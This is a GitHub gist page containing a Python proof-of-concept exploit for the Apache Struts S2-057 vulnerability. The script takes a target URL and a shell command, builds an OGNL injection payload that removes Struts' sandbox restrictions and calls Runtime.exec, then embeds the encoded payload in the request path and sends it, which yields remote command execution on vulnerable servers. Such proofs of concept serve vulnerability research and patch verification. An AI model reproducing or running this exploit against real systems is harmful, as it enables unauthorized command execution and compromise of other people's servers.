Skip to content

Instantly share code, notes, and snippets.

@frohoff
Created Aug 23, 2018
Embed
What would you like to do?
Struts S2-057 PoC exploit
# some ideas from https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg
import sys
import urllib
import urllib2
if len(sys.argv) != 3:
print 'Usage: %s [url] [command]' % sys.argv[0]
exit(1)
_, url, cmd = sys.argv
payload = "${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#context=#request['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedPackageNames('')).(#ognlUtil.setExcludedClasses('')).(#context.setMemberAccess(#dm)).(#cmd=@java.lang.Runtime@getRuntime().exec('%s'))}" % (cmd.replace('\\','\\\\').replace("'","\\'"))
url_parts = url.rsplit('/', 1)
request = url_parts[0] + '/' + urllib.quote(payload) + '/' + url_parts[1]
print 'payload: %s' % payload
print 'request: %s' % request
print 'making request'
urllib.urlopen(request)
print 'done'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment